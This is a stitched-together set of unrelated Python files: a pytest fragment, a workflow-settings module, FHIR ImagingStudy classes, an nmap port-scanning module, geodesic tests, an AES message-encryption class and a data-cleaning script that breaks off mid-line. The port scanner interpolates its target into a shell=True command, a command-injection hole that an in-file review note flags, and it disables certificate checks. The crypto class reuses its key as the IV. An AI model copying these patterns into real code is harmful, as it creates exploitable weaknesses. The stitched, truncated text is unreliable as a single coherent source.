    "Check that parsing fails with an exception"
    with pytest.raises(ValueError) as error:
        get_pyproject_toml_build({"meh": ["something"]})
    assert "Missing 'build-system'" in str(error)
    with pytest.raises(ValueError) as error:
        get_pyproject_toml_build({"build-system": {"something": []}})
    assert "Missing 'requires'" in str(error)
<filename>fiat/stages.py """ base: <NAME> <<EMAIL>> Copyright 2020-2021, <NAME> License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0) Contents: """ from __future__ import annotations import collections.abc import copy import dataclasses import itertools from types import ModuleType from typing import (Any, Callable, ClassVar, Dict, Hashable, Iterable, List, Mapping, MutableMapping, MutableSequence, Optional, Sequence, Set, Tuple, Type, Union) import denovo import more_itertools import fiat @dataclasses.dataclass class Section(denovo.quirks.Factory, denovo.containers.Lexicon): """Section of Outline with connections. Args: contents (MutableMapping[Hashable, Any]]): stored dictionary. Defaults to an empty dict. default_factory (Any): default value to return when the 'get' method is used. Defaults to None. """ contents: Dict[str, Any] = dataclasses.field(default_factory = dict) default_factory: Any = None name: str = None sources: ClassVar[Mapping[Type, str]] = { fiat.shared.bases.settings : 'settings'} """ Properties """ @property def bases(self) -> Dict[str, str]: return self._get_bases() @property def connections(self) -> Dict[str, List[str]]: return self._get_connections() @property def designs(self) -> Dict[str, str]: return self._get_designs() @property def nodes(self) -> List[str]: key_nodes = list(self.connections.keys()) value_nodes = list( itertools.chain.from_iterable(self.connections.values())) return denovo.tools.deduplicate(item = key_nodes + value_nodes) @property def other(self) -> Dict[str, str]: return self._get_other() @property def suffixes(self) -> List[str]: return denovo.shared.library.subclasses.suffixes """ Public Methods """ @classmethod def from_settings(cls, settings: fiat.shared.bases.settings, name: str, **kwargs) -> Section: """[summary] Args: settings (fiat.shared.bases.settings): [description] name (str): Returns: Section: derived from 'settings'. 
""" return cls(contents = settings[name], name = name, **kwargs) """ Private Methods """ def _get_bases(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ bases = {} for key in self.connections.keys(): prefix, suffix = denovo.tools.divide_string(key) values = denovo.tools.listify(self[key]) if suffix.endswith('s'): base = suffix[:-1] else: base = suffix bases.update(dict.fromkeys(values, base)) return bases def _get_connections(self) -> Dict[str, List[str]]: """[summary] Returns: Dict[str, List[str]]: [description] """ connections = {} keys = [k for k in self.keys() if k.endswith(self.suffixes)] for key in keys: prefix, suffix = denovo.tools.divide_string(key) values = denovo.tools.listify(self[key]) if prefix == suffix: if prefix in connections: connections[self.name].extend(values) else: connections[self.name] = values else: if prefix in connections: connections[prefix].extend(values) else: connections[prefix] = values return connections def _get_designs(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ designs = {} design_keys = [k for k in self.keys() if k.endswith('_design')] for key in design_keys: prefix, suffix = denovo.tools.divide_string(key) designs[prefix] = self[key] return designs def _get_other(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ design_keys = [k for k in self.keys() if k.endswith('_design')] connection_keys = [k for k in self.keys() if k.endswith(self.suffixes)] exclude = design_keys + connection_keys return {k: v for k, v in self.contents.items() if k not in exclude} @dataclasses.dataclass class Outline(denovo.quirks.Factory, denovo.containers.Lexicon): """Organized fiat project settings with convenient accessors. Args: contents (denovo.configuration.TwoLevel): a two-level nested dict for storing configuration options. Defaults to en empty dict. default (Any): default value to return when the 'get' method is used. Defaults to an empty dict. 
default (Mapping[str, Mapping[str]]): any default options that should be used when a user does not provide the corresponding options in their configuration settings. Defaults to an empty dict. infer_types (bool): whether values in 'contents' are converted to other datatypes (True) or left alone (False). If 'contents' was imported from an .ini file, all values will be strings. Defaults to True. """ contents: MutableMapping[str, Section] = dataclasses.field( default_factory = dict) default_factory: Any = None sources: ClassVar[Mapping[Type, str]] = { fiat.shared.bases.settings : 'settings'} """ Properties """ @property def bases(self) -> Dict[str, str]: return self._get_bases() @property def connections(self) -> Dict[str, List[str]]: return self._get_connections() @property def designs(self) -> Dict[str, str]: return self._get_designs() @property def initialization(self) -> Dict[str, Any]: return self._get_initialization() @property def nodes(self) -> List[str]: key_nodes = list(self.connections.keys()) value_nodes = list( itertools.chain.from_iterable(self.connections.values())) return denovo.tools.deduplicate(item = key_nodes + value_nodes) @property def other(self) -> Dict[str, Any]: return self._get_other() """ Public Methods """ @classmethod def from_settings(cls, settings: fiat.shared.bases.settings, **kwargs) -> Outline: """[summary] Args: Returns: Outline: derived from 'settings'. 
""" return fiat.workshop.settings_to_outline(settings = settings, **kwargs) """ Private Methods """ def _get_bases(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ bases = dict(zip(self.nodes, self.nodes)) for section in self.values(): bases.update(section.bases) return bases def _get_connections(self) -> Dict[str, List[str]]: """[summary] Returns: Dict[str, List[str]]: [description] """ connections = {} for section in self.values(): for key, links in section.connections.items(): if key in connections: connections[key].extend(links) else: connections[key] = links return connections def _get_designs(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ designs = {} for section in self.values(): designs.update(section.designs) return designs def _get_initialization(self) -> Dict[str, Dict[str, Any]]: """[summary] Returns: Dict[str, Dict[str, Any]]: [description] """ initialization = collections.defaultdict(dict) keys = [k.endswith('_parameters') for k in self.keys] for key in keys: prefix, suffix = denovo.tools.divide_string(key) initialization[prefix] = self[key] return initialization def _get_other(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ other = {} for section in self.values(): other.update(section.other) return other @dataclasses.dataclass class Workflow(denovo.structures.System): """Project workflow implementation as a directed acyclic graph (DAG). Workflow stores its graph as an adjacency list. Despite being called an "adjacency list," the typical and most efficient way to create one in python is using a dict. The keys of the dict are the nodes and the values are sets of the hashable summarys of other nodes. Workflow internally supports autovivification where a set is created as a value for a missing key. Args: contents (Adjacency): an adjacency list where the keys are nodes and the values are sets of hash keys of the nodes which the keys are connected to. 
Defaults to an empty a defaultdict described in '_DefaultAdjacency'. """ contents: denovo.structures.Adjacency = dataclasses.field( default_factory = lambda: collections.defaultdict(set)) """ Properties """ @property def cookbook(self) -> fiat.base.Cookbook: """Returns the stored workflow as a Cookbook of Recipes.""" return fiat.workshop.workflow_to_cookbook(source = self) """ Dunder Methods """ def __str__(self) -> str: """Returns prettier summary of the stored graph. Returns: str: a formatted str of class information and the contained adjacency list. """ return denovo.tools.beautify(item = self, package = 'fiat')
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#  Generated from FHIR 4.0.0-a53ec6ee1b (http://hl7.org/fhir/StructureDefinition/ImagingStudy) on 2019-01-22.
#  2019, SMART Health IT.


from . import domainresource

class ImagingStudy(domainresource.DomainResource):
    """ A set of images produced in single study (one or more series of
    references images).

    Representation of the content produced in a DICOM imaging study. A study
    comprises a set of series, each of which includes a set of Service-Object
    Pair Instances (SOP Instances - images or other data) acquired or produced
    in a common context. A series is of only one modality (e.g. X-ray, CT, MR,
    ultrasound), but a study may have multiple series of different modalities.
    """

    resource_type = "ImagingStudy"

    def __init__(self, jsondict=None, strict=True):
        """ Initialize all valid properties.

        :raises: FHIRValidationError on validation errors, unless strict is False
        :param dict jsondict: A JSON dictionary to use for initialization
        :param bool strict: If True (the default), invalid variables will raise a TypeError
        """

        self.basedOn = None
        """ Request fulfilled.
        List of `FHIRReference` items (represented as `dict` in JSON). """

        self.description = None
        """ Institution-generated description.
        Type `str`. """

        self.encounter = None
        """ Encounter with which this imaging study is associated.
        Type `FHIRReference` (represented as `dict` in JSON). """

        self.endpoint = None
        """ Study access endpoint.
        List of `FHIRReference` items (represented as `dict` in JSON). """

        self.identifier = None
        """ Identifiers for the whole study.
        List of `Identifier` items (represented as `dict` in JSON). """

        self.interpreter = None
        """ Who interpreted images.
        List of `FHIRReference` items (represented as `dict` in JSON). """

        self.location = None
        """ Where ImagingStudy occurred.
        Type `FHIRReference` (represented as `dict` in JSON). """

        self.modality = None
        """ All series modality if actual acquisition modalities.
        List of `Coding` items (represented as `dict` in JSON). """

        self.note = None
        """ User-defined comments.
        List of `Annotation` items (represented as `dict` in JSON). """

        self.numberOfInstances = None
        """ Number of Study Related Instances.
        Type `int`. """

        self.numberOfSeries = None
        """ Number of Study Related Series.
        Type `int`. """

        self.procedureCode = None
        """ The performed procedure code.
        List of `CodeableConcept` items (represented as `dict` in JSON). """

        self.procedureReference = None
        """ The performed Procedure reference.
        Type `FHIRReference` (represented as `dict` in JSON). """

        self.reasonCode = None
        """ Why the study was requested.
        List of `CodeableConcept` items (represented as `dict` in JSON). """

        self.reasonReference = None
        """ Why was study performed.
        List of `FHIRReference` items (represented as `dict` in JSON). """

        self.referrer = None
        """ Referring physician.
        Type `FHIRReference` (represented as `dict` in JSON). """

        self.series = None
        """ Each study has one or more series of instances.
        List of `ImagingStudySeries` items (represented as `dict` in JSON). """

        self.started = None
        """ When the study was started.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.status = None
        """ registered | available | cancelled | entered-in-error | unknown.
        Type `str`. """

        self.subject = None
        """ Who or what is the subject of the study.
        Type `FHIRReference` (represented as `dict` in JSON). """

        super(ImagingStudy, self).__init__(jsondict=jsondict, strict=strict)

    def elementProperties(self):
        js = super(ImagingStudy, self).elementProperties()
        js.extend([
            ("basedOn", "basedOn", fhirreference.FHIRReference, True, None, False),
            ("description", "description", str, False, None, False),
            ("encounter", "encounter", fhirreference.FHIRReference, False, None, False),
            ("endpoint", "endpoint", fhirreference.FHIRReference, True, None, False),
            ("identifier", "identifier", identifier.Identifier, True, None, False),
            ("interpreter", "interpreter", fhirreference.FHIRReference, True, None, False),
            ("location", "location", fhirreference.FHIRReference, False, None, False),
            ("modality", "modality", coding.Coding, True, None, False),
            ("note", "note", annotation.Annotation, True, None, False),
            ("numberOfInstances", "numberOfInstances", int, False, None, False),
            ("numberOfSeries", "numberOfSeries", int, False, None, False),
            ("procedureCode", "procedureCode", codeableconcept.CodeableConcept, True, None, False),
            ("procedureReference", "procedureReference", fhirreference.FHIRReference, False, None, False),
            ("reasonCode", "reasonCode", codeableconcept.CodeableConcept, True, None, False),
            ("reasonReference", "reasonReference", fhirreference.FHIRReference, True, None, False),
            ("referrer", "referrer", fhirreference.FHIRReference, False, None, False),
            ("series", "series", ImagingStudySeries, True, None, False),
            ("started", "started", fhirdate.FHIRDate, False, None, False),
            ("status", "status", str, False, None, True),
            ("subject", "subject", fhirreference.FHIRReference, False, None, True),
        ])
        return js


from . import backboneelement

class ImagingStudySeries(backboneelement.BackboneElement):
    """ Each study has one or more series of instances.

    Each study has one or more series of images or other content.
    """

    resource_type = "ImagingStudySeries"

    def __init__(self, jsondict=None, strict=True):
        """ Initialize all valid properties.

        :raises: FHIRValidationError on validation errors, unless strict is False
        :param dict jsondict: A JSON dictionary to use for initialization
        :param bool strict: If True (the default), invalid variables will raise a TypeError
        """

        self.bodySite = None
        """ Body part examined.
        Type `Coding` (represented as `dict` in JSON). """

        self.description = None
        """ A short human readable summary of the series.
        Type `str`. """

        self.endpoint = None
        """ Series access endpoint.
        List of `FHIRReference` items (represented as `dict` in JSON). """

        self.instance = None
        """ A single SOP instance from the series.
        List of `ImagingStudySeriesInstance` items (represented as `dict` in JSON). """

        self.laterality = None
        """ Body part laterality.
        Type `Coding` (represented as `dict` in JSON). """

        self.modality = None
        """ The modality of the instances in the series.
        Type `Coding` (represented as `dict` in JSON). """

        self.number = None
        """ Numeric identifier of this series.
        Type `int`. """

        self.numberOfInstances = None
        """ Number of Series Related Instances.
        Type `int`. """

        self.performer = None
        """ Who performed the series.
        List of `ImagingStudySeriesPerformer` items (represented as `dict` in JSON). """

        self.specimen = None
        """ Specimen imaged.
        List of `FHIRReference` items (represented as `dict` in JSON). """

        self.started = None
        """ When the series started.
        Type `FHIRDate` (represented as `str` in JSON). """

        self.uid = None
        """ DICOM Series Instance UID for the series.
        Type `str`. """

        super(ImagingStudySeries, self).__init__(jsondict=jsondict, strict=strict)

    def elementProperties(self):
        js = super(ImagingStudySeries, self).elementProperties()
        js.extend([
            ("bodySite", "bodySite", coding.Coding, False, None, False),
            ("description", "description", str, False, None, False),
            ("endpoint", "endpoint", fhirreference.FHIRReference, True, None, False),
            ("instance", "instance", ImagingStudySeriesInstance, True, None, False),
            ("laterality", "laterality", coding.Coding, False, None, False),
            ("modality", "modality", coding.Coding, False, None, True),
            ("number", "number", int, False, None, False),
            ("numberOfInstances", "numberOfInstances", int, False, None, False),
            ("performer", "performer", ImagingStudySeriesPerformer, True, None, False),
            ("specimen", "specimen", fhirreference.FHIRReference, True, None, False),
            ("started", "started", fhirdate.FHIRDate, False, None, False),
            ("uid", "uid", str, False, None, True),
        ])
        return js


class ImagingStudySeriesInstance(backboneelement.BackboneElement):
    """ A single SOP instance from the series.

    A single SOP instance within the series, e.g. an image, or presentation
    state.
    """

    resource_type = "ImagingStudySeriesInstance"

    def __init__(self, jsondict=None, strict=True):
        """ Initialize all valid properties.

        :raises: FHIRValidationError on validation errors, unless strict is False
        :param dict jsondict: A JSON dictionary to use for initialization
        :param bool strict: If True (the default), invalid variables will raise a TypeError
        """

        self.number = None
        """ The number of this instance in the series.
        Type `int`. """

        self.sopClass = None
        """ DICOM class type.
        Type `Coding` (represented as `dict` in JSON). """

        self.title = None
        """ Description of instance.
        Type `str`. """

        self.uid = None
        """ DICOM SOP Instance UID.
        Type `str`. """

        super(ImagingStudySeriesInstance, self).__init__(jsondict=jsondict, strict=strict)

    def elementProperties(self):
        js = super(ImagingStudySeriesInstance, self).elementProperties()
        js.extend([
            ("number", "number", int, False, None, False),
            ("sopClass", "sopClass", coding.Coding, False, None, True),
            ("title", "title", str, False, None, False),
            ("uid", "uid", str, False, None, True),
        ])
        return js


class ImagingStudySeriesPerformer(backboneelement.BackboneElement):
    """ Who performed the series.

    Indicates who or what performed the series and how they were involved.
    """

    resource_type = "ImagingStudySeriesPerformer"

    def __init__(self, jsondict=None, strict=True):
        """ Initialize all valid properties.

        :raises: FHIRValidationError on validation errors, unless strict is False
        :param dict jsondict: A JSON dictionary to use for initialization
        :param bool strict: If True (the default), invalid variables will raise a TypeError
        """

        self.actor = None
        """ Who performed the series.
        Type `FHIRReference` (represented as `dict` in JSON). """

        self.function = None
        """ Type of performance.
        Type `CodeableConcept` (represented as `dict` in JSON). """

        super(ImagingStudySeriesPerformer, self).__init__(jsondict=jsondict, strict=strict)

    def elementProperties(self):
        js = super(ImagingStudySeriesPerformer, self).elementProperties()
        js.extend([
            ("actor", "actor", fhirreference.FHIRReference, False, None, True),
            ("function", "function", codeableconcept.CodeableConcept, False, None, False),
        ])
        return js


import sys
try:
    from . import annotation
except ImportError:
    annotation = sys.modules[__package__ + '.annotation']
try:
    from . import codeableconcept
except ImportError:
    codeableconcept = sys.modules[__package__ + '.codeableconcept']
try:
    from . import coding
except ImportError:
    coding = sys.modules[__package__ + '.coding']
try:
    from . import fhirdate
except ImportError:
    fhirdate = sys.modules[__package__ + '.fhirdate']
try:
    from . import fhirreference
except ImportError:
    fhirreference = sys.modules[__package__ + '.fhirreference']
try:
    from . import identifier
except ImportError:
    identifier = sys.modules[__package__ + '.identifier']
<filename>core/portscan.py
#-------------------------------------------------------------------------------
# Name: RPTR Portscan
# Purpose: Portscanning
#
# Author: <NAME>
#
# Created: 03-10-2016
# Copyright: <NAME> (c)
# Version: 1.0
#-------------------------------------------------------------------------------
# NOTE(review): this module is Python 2 code (print statements, urllib2,
# dict.iteritems) and will not run under Python 3 without porting.

import os
import subprocess
import time
import urllib2
import difflib
import ssl
from lxml import etree
from dbmanager import *


class Portscan():
    """Run an nmap service scan against a single target, parse the XML
    output, and record open ports (plus a vulnerability entry when a
    management interface such as ssh/telnet/vnc is exposed)."""

    def __init__(self, id_test, target, save_path):
        """
        :param id_test: database id of the test run this scan belongs to
        :param target: host/IP handed verbatim to nmap
        :param save_path: directory where nmap_scan.xml is written
        """
        self.ports = []           # list of dicts, one per discovered open port
        self.id_test = id_test
        self.target = target
        self.save_path = save_path
        self.output = None        # raw stdout of the nmap run
        #fire bullet
        self.dbmanager = Dbmanager()
        #management interfaces
        # service names that count as remote-management interfaces
        self.manif = ['ssh', 'telnet', 'vnc', 'ftp', 'mysql', 'microsoft-ds', 'msrpc']
        self.manif_found = False  # set True by parse() if any of the above is seen

    def parse(self, file_name):
        """Parse an nmap XML report and fill self.ports.

        Each entry gets keys: port, service, product, version, tunnel,
        duplicate. 'duplicate' is True for port 443 when it serves the
        same site as port 80 (to avoid scanning the site twice).
        """
        port80 = False
        doc = etree.parse(file_name)
        # hosts that have at least one open port
        for x in doc.xpath("//host[ports/port[state[@state='open']]]"):
            for open_p in x.xpath("ports/port[state[@state='open']]"):
                # NOTE(review): positional access into attrib.values() assumes
                # the port number is always the second attribute — fragile;
                # confirm against the nmap XML schema.
                item = open_p.attrib.values()
                port = item[1]
                for child in list(open_p):
                    service = None
                    product = None
                    version = None
                    tunnel = None
                    # pull the interesting attributes off the <service> element
                    for x in child.attrib.iteritems():
                        if(x[0] == 'name'):
                            service = x[1]
                        if(x[0] == 'product'):
                            product = x[1]
                        if(x[0] == 'version'):
                            version = x[1]
                        if(x[0] == 'tunnel'):
                            tunnel = x[1]
                    #following test is added to prevent double scanning
                    if port == "80":
                        port80 = True
                    if port == "443" and port80:
                        if self.check_diff_80_443(self.target):
                            print "80 and 443 are same site"
                            self.ports.append({"port": port, "service": service, "product": product, "version": version, "tunnel": tunnel, "duplicate": True})
                            continue
                    #check if management interface is detected
                    if service in self.manif:
                        self.manif_found = True
                    self.ports.append({"port": port, "service": service, "product": product, "version": version, "tunnel": tunnel, "duplicate": False})

    def fire_scan(self):
        """Run nmap, log the invocation to the database, then parse results."""
        #get current time
        start = time.time()
        #start tool execution in new proces
        # NOTE(review): shell=True with string interpolation of self.target /
        # self.save_path is a command-injection risk if either is attacker
        # controlled — consider a list argv with shell=False.
        command = "nmap --open --top-ports=50 -sV -oX "+self.save_path+"/nmap_scan.xml "+self.target
        p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)
        #get output form process
        out, err = p.communicate()
        self.output = out
        #calculate how much time the tool used
        exec_time = time.strftime("%H:%M:%S", time.gmtime(time.time() - start))
        #write tool output to database
        id_tool_log = self.dbmanager.tool_log_create(self.id_test, command, exec_time, out)
        #parse result
        self.parse(self.save_path+"/nmap_scan.xml")
        #if management ports are open, create a vulnerability for it
        if self.manif_found:
            self.dbmanager.vulnerability_create(self.id_test, id_tool_log, 1, out)

    def get_ports(self):
        """Return the list of port dicts produced by parse()."""
        return self.ports

    #check if port 80 and 443 are the same
    #used to prevent double scanning a website
    def check_diff_80_443(self, url):
        """Fetch the first 25 kB over http and https and compare them.

        Returns True when the similarity ratio exceeds 0.75 (same site);
        returns False on any fetch error (best-effort by design).
        """
        try:
            url = url.replace("'", "")
            f = urllib2.urlopen("http://"+url)
            # rewrite scheme so identical pages differing only in absolute
            # links do not lower the similarity score
            html80 = f.read(25000).replace("http://", "https://")
            try:
                # first attempt: ignore certificate problems on the TLS side
                ctx = ssl.create_default_context()
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE
                f = urllib2.urlopen("https://"+url, context=ctx)
            except:
                # older Pythons without the context kwarg fall back here
                f = urllib2.urlopen("https://"+url)
            html443 = f.read(25000)
            # whitespace is treated as junk for the diff
            s = difflib.SequenceMatcher(lambda x: x == " ", html443, html80)
            if round(s.ratio(), 3) > 0.75:
                return True
            return False
        except:
            # NOTE(review): bare except silently maps every failure to
            # "different sites" — deliberate best-effort, but hides bugs.
            return False
<reponame>nathancarter/geo-py
# Unit tests for geo: compares the pure-Python implementations (_py_*)
# against their C-accelerated counterparts on a fixed Minsk->Moscow pair.
import unittest
import time
import logging
import math

import geo.sphere as sphere
import geo._sphere as _sphere
import geo.ellipsoid as ellipsoid
import geo._ellipsoid as _ellipsoid
import geo._sphere as csphere

logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger()

# fixed test points as (longitude, latitude) pairs
p_minsk = (27.561831, 53.902257)
p_moscow = (37.620393, 55.75396)


def isclose(a, b, rel_tol=1e-09, abs_tol=0):
    """
    Python 2 implementation of Python 3.5 math.isclose()
    https://hg.python.org/cpython/file/v3.5.2/Modules/mathmodule.c#l1993
    """
    # sanity check on the inputs
    if rel_tol < 0 or abs_tol < 0:
        raise ValueError("tolerances must be non-negative")

    # short circuit exact equality -- needed to catch two infinities of
    # the same sign. And perhaps speeds things up a bit sometimes.
    if a == b:
        return True

    # This catches the case of two infinities of opposite sign, or
    # one infinity and one finite number. Two infinities of opposite
    # sign would otherwise have an infinite relative tolerance.
    # Two infinities of the same sign are caught by the equality check
    # above.
    if math.isinf(a) or math.isinf(b):
        return False

    # Cast to float to allow decimal.Decimal arguments
    if not isinstance(a, float):
        a = float(a)
    if not isinstance(b, float):
        b = float(b)

    # now do the regular computation
    # this is essentially the "weak" test from the Boost library
    diff = math.fabs(b - a)
    result = ((diff <= math.fabs(rel_tol * a)) or
              (diff <= math.fabs(rel_tol * b)) or
              (diff <= abs_tol))
    return result

# Backport: install the shim only on interpreters without math.isclose
# (Python < 3.5). Must run before the test classes use math.isclose.
if not hasattr(math, 'isclose'):
    math.isclose = isclose


class TestSphere(unittest.TestCase):
    """Spherical-model distances and EPSG:4326 <-> EPSG:3857 projections."""

    def test_distance(self):
        # expected values are in meters; Python and C paths must agree
        assert math.isclose(
            sphere._py_approximate_distance(p_minsk, p_moscow),
            676371.322420, rel_tol=1e-06)
        assert math.isclose(
            _sphere._approximate_distance(p_minsk, p_moscow),
            676371.322420, rel_tol=1e-06)
        assert math.isclose(
            sphere._py_haversine_distance(p_minsk, p_moscow),
            675656.299481, rel_tol=1e-06)
        assert math.isclose(
            _sphere._haversine_distance(p_minsk, p_moscow),
            675656.299481, rel_tol=1e-06)
        assert math.isclose(
            sphere._py_distance(p_minsk, p_moscow),
            675656.299481, rel_tol=1e-06)
        assert math.isclose(
            _sphere._distance(p_minsk, p_moscow),
            675656.299481, rel_tol=1e-06)

    def test_projection(self):
        # forward projection to Web Mercator (EPSG:3857)
        x, y = sphere._py_from4326_to3857(p_minsk)
        assert math.isclose(x, 3068168.9922502628, rel_tol=1e-06)
        assert math.isclose(y, 7151666.629430503, rel_tol=1e-06)

        x, y = _sphere._from4326_to3857(p_minsk)
        assert math.isclose(x, 3068168.9922502628, rel_tol=1e-06)
        assert math.isclose(y, 7151666.629430503, rel_tol=1e-06)

        # round trip must reproduce the original lon/lat
        lon, lat = sphere._py_from3857_to4326(
            sphere._py_from4326_to3857(p_minsk))
        assert math.isclose(lon, p_minsk[0], rel_tol=1e-06)
        assert math.isclose(lat, p_minsk[1], rel_tol=1e-06)

        lon, lat = _sphere._from3857_to4326(
            _sphere._from4326_to3857(p_minsk))
        assert math.isclose(lon, p_minsk[0], rel_tol=1e-06)
        assert math.isclose(lat, p_minsk[1], rel_tol=1e-06)


class TestEllipsoid(unittest.TestCase):
    """Ellipsoidal-model distances and EPSG:4326 <-> EPSG:3395 projections."""

    def test_distance(self):
        assert math.isclose(
            ellipsoid._py_distance(p_minsk, p_moscow),
            677789.531233, rel_tol=1e-06)
        assert math.isclose(
            _ellipsoid._distance(p_minsk, p_moscow),
            677789.531233, rel_tol=1e-06)

    def test_projection(self):
        # forward projection to World Mercator (EPSG:3395) — exact match
        assert (
            ellipsoid._py_from4326_to3395(p_minsk) ==
            (3068168.9922502623, 7117115.955611216)
        )

        # round trip within relative tolerance only (inverse is iterative)
        rp_minsk = ellipsoid._py_from3395_to4326(
            ellipsoid._py_from4326_to3395(p_minsk))
        assert math.isclose(rp_minsk[0], p_minsk[0], rel_tol=1e-06)
        assert math.isclose(rp_minsk[1], p_minsk[1], rel_tol=1e-06)

        assert (
            _ellipsoid._from4326_to3395(p_minsk) ==
            (3068168.9922502623, 7117115.955611216)
        )

        rp_minsk = _ellipsoid._from3395_to4326(
            _ellipsoid._from4326_to3395(p_minsk))
        assert math.isclose(rp_minsk[0], p_minsk[0], rel_tol=1e-06)
        assert math.isclose(rp_minsk[1], p_minsk[1], rel_tol=1e-06)
<reponame>sns-sdks/python-workweixin """ 消息加密与解密 """ import base64 import logging import random import socket import struct from Crypto.Cipher import AES from pywework.error import ErrorCode from .padding import PKCS7Padding logger = logging.getLogger(__name__) class MsgCrypto: """ 数据消息的加密与解密 """ def __init__(self, key: bytes) -> None: """ :param key: 加密消息的 key """ self.key = key self.mode = AES.MODE_CBC # 加解密的模式 def encipher(self, plain_text: str, receive_id: str): """ 对明文数据进行补位后加密 :param plain_text: 需要加密的明文 :param receive_id: corp_id 或者 suite_id https://work.weixin.qq.com/api/doc#90000/90139/90968/%E9%99%84%E6%B3%A8 :return: 加密后的字符串 """ plain_text_bytes: bytes = plain_text.encode() # 拼接明文 plain_text_bytes = b"".join( [ self.get_random_str().encode(), # 16字节 随机字符串 struct.pack("I", socket.htonl(len(plain_text_bytes))), # 4字节 消息长度 plain_text_bytes, # 消息内容 receive_id.encode(), # receive id ] ) # 消息补位 pkcs7 = PKCS7Padding() plain_text_bytes = pkcs7.encode(plain_text_bytes) # 数据加密 crypter = AES.new(self.key, self.mode, self.key[:16]) try: cipher_text = crypter.encrypt(plain_text_bytes) return ErrorCode.WXBizMsgCrypt_OK, base64.b64encode(cipher_text) except Exception as e: logger.error(e) return ErrorCode.WXBizMsgCrypt_EncryptAES_Error, None def decipher(self, cipher_text: str, receive_id: str): """ 对密文解密后移除补位 :param cipher_text: 密文 :param receive_id: corp_id 或者 suite_id https://work.weixin.qq.com/api/doc#90000/90139/90968/%E9%99%84%E6%B3%A8 :return: 明文数据 """ crypter = AES.new(self.key, self.mode, self.key[:16]) try: plain_text = crypter.decrypt(base64.b64decode(cipher_text)) except Exception as e: logger.error(e) return ErrorCode.WXBizMsgCrypt_DecryptAES_Error, None # 移除补位 pkcs7 = PKCS7Padding() plain_text = pkcs7.decode(plain_text) # 移除随机字符串 plain_text = plain_text[16:] # 消息长度 msg_len = socket.ntohl(struct.unpack("I", plain_text[:4])[0]) # 消息内容 msg_content = plain_text[4: (msg_len + 4)] # receive id from_received = plain_text[(msg_len + 4):] # 判断 receive id if 
from_received.decode("utf-8") != receive_id: return ErrorCode.WXBizMsgCrypt_ValidateCorpid_Error, None return ErrorCode.WXBizMsgCrypt_OK, msg_content.decode("utf-8") @staticmethod def get_random_str() -> str: """ 生成随机的16位字符串 :return: """ return str(random.randint(1000000000000000, 9999999999999999))
<reponame>yapanliu/ashrae-ob-database ''' This code will clean the OB datasets and combine all the cleaned data into one Dataset name: O-62-Zoltan Nagy _ June Young Park 1. occupancy data 2. light switch data 3. indoor illuminance data 4. four different rooms in an academic office bulding 5. different time ranges Data_1: 5/7/2018 – 6/30/2018 Data_2: 5/7/2018 – 6/30/2018 Data_3: 5/16/2018 – 6/30/2018 Data_4: 5/7/2018 – 6/30/2018 Data_5: 5/12/2018 – 6/30/2018 ''' import os import glob import string import datetime import pandas as pd # specify the path data_path = 'D:/yapan_office_D/Data/Annex-79-OB-Database/2021-05-28-1130-raw-data/Annex 79 Data Collection/O-62-Zoltan Nagy _ June Young Park/' template_path = 'D:/yapan_office_D/Data/Annex-79-OB-Database/OB Database Consolidation/Templates/' save_path = 'D:/yapan_office_D/Data/Annex-79-OB-Database/2021-05-28-1130-raw-data/Annex 79 Data Collection/O-62-Zoltan Nagy _ June Young Park/_yapan_processing/' # read templates into pandas template_occupancy = pd.read_csv(template_path + 'Occupancy_Measurement.csv') template_light = pd.read_csv(template_path + 'Ligthing_Status.csv') template_indoor = pd.read_csv(template_path + 'Indoor_Measurement.csv') # read data into pandas data_1 = pd.read_csv(data_path + 'data_1.csv') data_2 = pd.read_csv(data_path + 'data_2.csv') data_3 = pd.read_csv(data_path + 'data_3.csv') data_4 = pd.read_csv(data_path + 'data_4.csv') data_5 = pd.read_csv(data_path + 'data_5.csv') # change column names col_names = ['Time', 'Ligthing_Status', 'Occupancy_Measurement', 'Indoor_Illuminance'] data_1.columns = col_names data_2.columns = col_names data_3.columns = col_names data_4.columns = col_names data_5.columns = col_names # change the format of Time column # data_1.dtypes # add columns data_1['Time'] = pd.to_datetime(data_1['Time'], format='%H:%M:%S').dt.time data_1['Hour'] = pd.to_datetime(data_1['Time'], format='%H:%M:%S').dt.hour data_1['Date'] = None data_2['Time'] = pd.to_datetime(data_2['Time'], 
format='%H:%M:%S').dt.time data_2['Hour'] = pd.to_datetime(data_2['Time'], format='%H:%M:%S').dt.hour data_2['Date'] = None data_3['Time'] = pd.to_datetime(data_3['Time'], format='%H:%M:%S').dt.time data_3['Hour'] = pd.to_datetime(data_3['Time'], format='%H:%M:%S').dt.hour data_3['Date'] = None data_4['Time'] = pd.to_datetime(data_4['Time'], format='%H:%M:%S').dt.time data_4['Hour'] = pd.to_datetime(data_4['Time'], format='%H:%M:%S').dt.hour data_4['Date'] = None data_5['Time'] = pd.to_datetime(data_5['Time'], format='%H:%M:%S').dt.time data_5['Hour'] = pd.to_datetime(data_5['Time'], format='%H:%M:%S').dt.hour data_5['Date'] = None # data_1.shape date_list_1 = pd.date_range('2018-05-07', '2018-07-01', freq='1D') date_list_2 = date_list_1 date_list_3 = pd.date_range('2018-05-16', '2018-07-01', freq='1D') date_list_4 = date_list_1 date_list_5 = pd.date_range('2018-05-12', '2018-07-01', freq='1D') # data 1 # loop through the rows and compare the hours, assign the dates begin_time = datetime.datetime.now() date_index = 0 for index in range(data_1.shape[0]-1): data_1.loc[index, 'Date'] = date_list_1[date_index].date() if (data_1.loc[index, 'Hour'] == 23) and (data_1.loc[index + 1, 'Hour'] == 0): date_index += 1 data_1.loc[index + 1, 'Date'] = date_list_1[date_index].date() else: data_1.loc[index + 1, 'Date'] = date_list_1[date_index].date() pass # create Date_Time column based on Date and Time data_1['Date_Time'] = data_1['Date'].astype(str) + ' ' + data_1['Time'].astype(str) data_1['Date_Time'] = 